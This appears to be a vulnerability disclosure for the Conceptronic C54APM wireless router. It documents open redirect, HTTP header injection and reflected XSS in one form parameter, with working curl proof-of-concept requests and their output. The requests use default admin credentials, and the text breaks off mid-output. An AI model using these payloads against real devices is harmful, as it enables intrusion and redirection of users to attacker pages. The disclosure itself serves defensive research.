Device description: Device datasheet can be downloaded from the product webpage: http://www.conceptronic.net/es/download_list.php?stype=3&productid=341 Vulnerable firmware releases: Device Name: C54APM Vendor: Conceptronic Hardware Version: v2 Runtime Code Version: v1.26 Vulnerability overview: 1. URL redirection: If submit-url parameter is provided in/goform/formWlSiteSurvey a location header will be put in the response so the page will get redirected. Note that the refresh parameter is needed with the value Refresh . &#8226; A possible fix would be fixed redirecting to /wlsurvey2.asp as it is the only place on where this is used but there are many other better solutions. curl -v "http://admin:admin@192.168.2.1/goform/formWlSiteSurvey? refresh=Refresh&submit-url= http://google.com/ " * About to connect() to 192.168.2.1 port 80 (#0) * Trying 192.168.2.1... * Adding handle: conn: 0xcb02a0 * Adding handle: send: 0 * Adding handle: recv: 0 * Curl_addHandleToPipeline: length: 1 * - Conn 0 (0xcb02a0) send_pipe: 1, recv_pipe: 0 * Connected to 192.168.2.1 (192.168.2.1) port 80 (#0) * Server auth using Basic with user 'admin' > GET /goform/formWlSiteSurvey?refresh=Refresh&submit- url=http://google.com/ HTTP/1.1 > Authorization: Basic YWRtaW46YWRtaW4= > User-Agent: curl/7.30.0 > Host: 192.168.2.1 > Accept: */* > * HTTP 1.0, assume close after body < HTTP/1.0 302 Redirect < Server: GoAhead-Webs < Date: Sat Jan 1 00:08:34 2000 < Pragma: no-cache < Cache-Control: no-cache < Content-Type: text/html < Location: http://google.com/ < <html><head></head><body> This document has moved to a new <a href=" http://google.com/ ">location</a>. Please update your documents to reflect the new location. </body></html> * Closing connection 0 2. Http header injection: &#8226; The parameter submit-url in form /goform/formWlSiteSurvey is not properly validated so newline characters can be used for http header injection and not only relocation. &#8226; Note that the refresh parameter is needed with the value Refresh . &#8226; A possible solution is explained in the previous vulnerability. curl -v "http://admin:admin@192.168.2.1/goform/formWlSiteSurvey? refresh=Refresh&submit-url=/wlsurvey2.asp%0d%0aNew%20Header:%20PWND" * About to connect() to 192.168.2.1 port 80 (#0) * Trying 192.168.2.1... * Adding handle: conn: 0x1e5f340 * Adding handle: send: 0 * Adding handle: recv: 0 * Curl_addHandleToPipeline: length: 1 * - Conn 0 (0x1e5f340) send_pipe: 1, recv_pipe: 0 * Connected to 192.168.2.1 (192.168.2.1) port 80 (#0) * Server auth using Basic with user 'admin' > GET /goform/formWlSiteSurvey?refresh=Refresh&submit- url=/wlsurvey2.asp%0d%0aNew%20Header:%20PWND HTTP/1.1 > Authorization: Basic YWRtaW46YWRtaW4= > User-Agent: curl/7.30.0 > Host: 192.168.2.1 > Accept: */* > * HTTP 1.0, assume close after body < HTTP/1.0 302 Redirect < Server: GoAhead-Webs < Date: Sat Jan 1 00:26:07 2000 < Pragma: no-cache < Cache-Control: no-cache < Content-Type: text/html < Location: http://192.168.2.1/wlsurvey2.asp < New Header: PWND < <html><head></head><body> This document has moved to a new <a href="http://192.168.2.1/wlsurvey2.asp New Header: PWND">location</a>. Please update your documents to reflect the new location. </body></html> * Closing connection 0 3. Reflected XSS: &#8226; The parameter submit-url in form /goform/formWlSiteSurvey is not properly validated so html tags can be injected in the return webpage. &#8226; Note that the refresh parameter is needed with the value Refresh . &#8226; A possible solution is explained in vulnerability number 1. curl -v 'http://admin:admin@192.168.2.1/goform/formWlSiteSurvey? refresh=Refresh&submit-url="><script>alert('XSSed')</script>' * About to connect() to 192.168.2.1 port 80 (#0) * Trying 192.168.2.1... * Adding handle: conn: 0x123b2f0 * Adding handle: send: 0 * Adding handle: recv: 0 * Curl_addHandleToPipeline: length: 1 * - Conn 0 (0x123b2f0) send_pipe: 1, recv_pipe: 0 * Connected to 192.168.2.1 (192.168.2.1) port 80 (#0)